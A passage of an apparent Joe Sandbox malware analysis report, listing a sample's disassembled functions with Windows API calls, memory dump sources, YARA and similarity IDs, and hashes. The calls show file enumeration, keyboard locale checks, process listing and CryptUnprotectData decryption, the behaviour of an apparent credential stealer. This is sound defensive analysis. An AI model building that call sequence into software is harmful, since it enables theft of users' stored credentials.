                                      • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00130D79), ref: 0011E5A2
                                      • StrCmpCA.SHLWAPI(?,001315F0), ref: 0011E5F2
                                      • StrCmpCA.SHLWAPI(?,001315F4), ref: 0011E608
                                      • FindNextFileA.KERNEL32(000000FF,?), ref: 0011ECDF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                      • String ID: \*.*$
                                      • API String ID: 433455689-3283393764
                                      • Opcode ID: c4a61fb178381f1b232925e1e5c61220d11b441e13477506f970ca1151a251ab
                                      • Instruction ID: 3fd129e9c7f96286f5411096d640fd620e20fda7b55b7950281469a29d144713
                                      • Opcode Fuzzy Hash: c4a61fb178381f1b232925e1e5c61220d11b441e13477506f970ca1151a251ab
                                      • Instruction Fuzzy Hash: AC12E671A101289BCB19FB60EDA6EED7379AF74300F8045E9B50A66191EF306F58CF52
                                      Function 00127D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0012AA50: lstrcpy.KERNEL32(00130E1A,00000000), ref: 0012AA98
                                      • GetKeyboardLayoutList.USER32(00000000,00000000,001305B7), ref: 00127D71
                                      • LocalAlloc.KERNEL32(00000040,?), ref: 00127D89
                                      • GetKeyboardLayoutList.USER32(?,00000000), ref: 00127D9D
                                      • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00127DF2
                                      • LocalFree.KERNEL32(00000000), ref: 00127EB2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                      • String ID: /
                                      • API String ID: 3090951853-4001269591
                                      • Opcode ID: b7ec97a4a7248c97ba92b164d8fbb3ecc35e6521825499803bcfacf46fde1f68
                                      • Instruction ID: c16ac043921070b01e29e0d9be50ead69d42e7c30d6c8db8dad5ba22058c63a8
                                      • Opcode Fuzzy Hash: b7ec97a4a7248c97ba92b164d8fbb3ecc35e6521825499803bcfacf46fde1f68
                                      • Instruction Fuzzy Hash: C1416071940228ABCB24DB94EC99BEEB378FF54700F5045D9E10966290DB742F94CFA1
                                      Function 0058060B Relevance: 9.1, Strings: 6, Instructions: 1596COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: -N*y$AP}o$Qv|$_:q$zw}$~7
                                      • API String ID: 0-2152543367
                                      • Opcode ID: 49afe0b7e48fc61de336f90467320d437aa2a53409c207d3f5a63165280a6dc8
                                      • Instruction ID: a8d0b78afb08fa0ee82e98f5152e2a60463aba8b7abe853b635b4cd64fba9b5f
                                      • Opcode Fuzzy Hash: 49afe0b7e48fc61de336f90467320d437aa2a53409c207d3f5a63165280a6dc8
                                      • Instruction Fuzzy Hash: 98B209F3A0C2049FE304AE2DEC8567AFBE9EB94320F1A493DEAC5C3744E57558058697
                                      Function 0056E025 Relevance: 9.1, Strings: 6, Instructions: 1590COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: 4&Oo$:p~;$G!;{$MVo7$f?}$o}j
                                      • API String ID: 0-3054999465
                                      • Opcode ID: ca7525532ea959a7a29365dee24c06376a07b09aaaef3b770dc57acf626ce1fe
                                      • Instruction ID: 7d0bd99d964b494d56409acdf549d8e436e526c7575d52f899b2932808b846f6
                                      • Opcode Fuzzy Hash: ca7525532ea959a7a29365dee24c06376a07b09aaaef3b770dc57acf626ce1fe
                                      • Instruction Fuzzy Hash: DDB2E5F3A082109FE3046F29EC85A7AFBE9EF94720F1A493DE6C4C7744E63558418796
                                      Function 00582129 Relevance: 7.9, Strings: 5, Instructions: 1634COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: !(ym$0o4j$?V{g$~K?w$~Y/
                                      • API String ID: 0-1041309207
                                      • Opcode ID: 7a5240142ce0f6eb296a63cbfadbeb6ba39843b46d218e558db016a4033302ff
                                      • Instruction ID: 661d67fa5e70fade766fcc2811f80559c56007a64e5c63850a732cc1c99d4118
                                      • Opcode Fuzzy Hash: 7a5240142ce0f6eb296a63cbfadbeb6ba39843b46d218e558db016a4033302ff
                                      • Instruction Fuzzy Hash: 51B228F360C204AFE3046E2DEC8567AFBE9EF94260F1A463DE6C4C3744E97598058697
                                      Function 005730CC Relevance: 7.8, Strings: 5, Instructions: 1566COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: ISv}$In?$PsV;$T8o$h_w
                                      • API String ID: 0-309991843
                                      • Opcode ID: e1051e8325ea6589b6e26426a67a64abde73649652da43f9de9b5d60b92cddb8
                                      • Instruction ID: a45fba484bab68370739d11de2046f359d9e9d005eae098fc3f188eb4b0271fd
                                      • Opcode Fuzzy Hash: e1051e8325ea6589b6e26426a67a64abde73649652da43f9de9b5d60b92cddb8
                                      • Instruction Fuzzy Hash: A5A2FAF3A0C2049FE304AE29EC8577ABBE9EF94720F1A853DE6C4C7744E63558058697
                                      Function 0017F8D6 Relevance: 7.6, Strings: 6, Instructions: 123COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID: \u$\u${${$}$}
                                      • API String ID: 0-582841131
                                      • Opcode ID: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction ID: 1ba6de97e10441152faff99246d74fbb9c551f9a61b6bf9de75d62db466395c9
                                      • Opcode Fuzzy Hash: 27d9cd0be1a73f01c92297f6708ad4a9299737c53231bb6b8c18bba91e257b74
                                      • Instruction Fuzzy Hash: 01418E12E19BD9C5CB058B7444A02AEBFB22FE6210F6D82EEC4DD1F782C774414AD3A5
                                      Function 0011C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0011C971
                                      • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0011C97C
                                      • lstrcat.KERNEL32(?,00130B47), ref: 0011CA43
                                      • lstrcat.KERNEL32(?,00130B4B), ref: 0011CA57
                                      • lstrcat.KERNEL32(?,00130B4E), ref: 0011CA78
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$BinaryCryptStringlstrlen
                                      • String ID:
                                      • API String ID: 189259977-0
                                      • Opcode ID: 5ff843c5e13aae8732407f174de35d55376d1d1cbf53f9f751c1b5485ce2dbdd
                                      • Instruction ID: de6ec34147d026b037cab335204146b5e370b1d26e031022b4f9e931f2c83136
                                      • Opcode Fuzzy Hash: 5ff843c5e13aae8732407f174de35d55376d1d1cbf53f9f751c1b5485ce2dbdd
                                      • Instruction Fuzzy Hash: D0415174D0421D9BDB25CFA4DD89BEEF7B8AF48304F1046A8E509A72C0D7705A84CF91
                                      Function 001172A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001172AD
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 001172B4
                                      • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001172E1
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00117304
                                      • LocalFree.KERNEL32(?), ref: 0011730E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                      • String ID:
                                      • API String ID: 2609814428-0
                                      • Opcode ID: 6ac9017addc1fea444bca78b99ec6381229ceb89f8a076a0a1a56e91078fb06a
                                      • Instruction ID: 98fd64208c0c04234a9e678241defdfde8a30e8c4cf37e6c8a6f78ee52de7791
                                      • Opcode Fuzzy Hash: 6ac9017addc1fea444bca78b99ec6381229ceb89f8a076a0a1a56e91078fb06a
                                      • Instruction Fuzzy Hash: B9010C75A44308BBDB24DFE4DD46F9E7778AB44B00F104554FB05AA2C0D6B0AA409B64
                                      Function 00129790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001297AE
                                      • Process32First.KERNEL32(00130ACE,00000128), ref: 001297C2
                                      • Process32Next.KERNEL32(00130ACE,00000128), ref: 001297D7
                                      • StrCmpCA.SHLWAPI(?,00000000), ref: 001297EC
                                      • CloseHandle.KERNEL32(00130ACE), ref: 0012980A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197067346.0000000000859000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2197081332.000000000085A000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_110000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                      • String ID:
                                      • API String ID: 420147892-0
                                      • Opcode ID: e98b58423268831688140d81c905c0fb0a8fba5ee0e38841d82873e926f0e7ae
                                      • Instruction ID: e8846984974bb564fe00ccf5e9c4c76594e9899af5ffe7ac75730e620efe5981
                                      • Opcode Fuzzy Hash: e98b58423268831688140d81c905c0fb0a8fba5ee0e38841d82873e926f0e7ae
                                      • Instruction Fuzzy Hash: 8A011E75A14218EBDB25DFA4DD88BDDB7BCBB08700F144688E5099B280E7309B50CF50
                                      Function 00134573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2196494984.0000000000111000.00000040.00000001.01000000.00000003.sdmp, Offset: 00110000, based on PE: true
                                      • Associated: 00000000.00000002.2196480304.0000000000110000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000013C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000024D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.0000000000259000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.000000000027E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196494984.00000000003E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000003FA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000590000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000672000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.0000000000699000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006A0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196696042.00000000006AF000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2196958886.00000000006B0000.00000080.00000001.01000000.00000003.sdmpDownload File
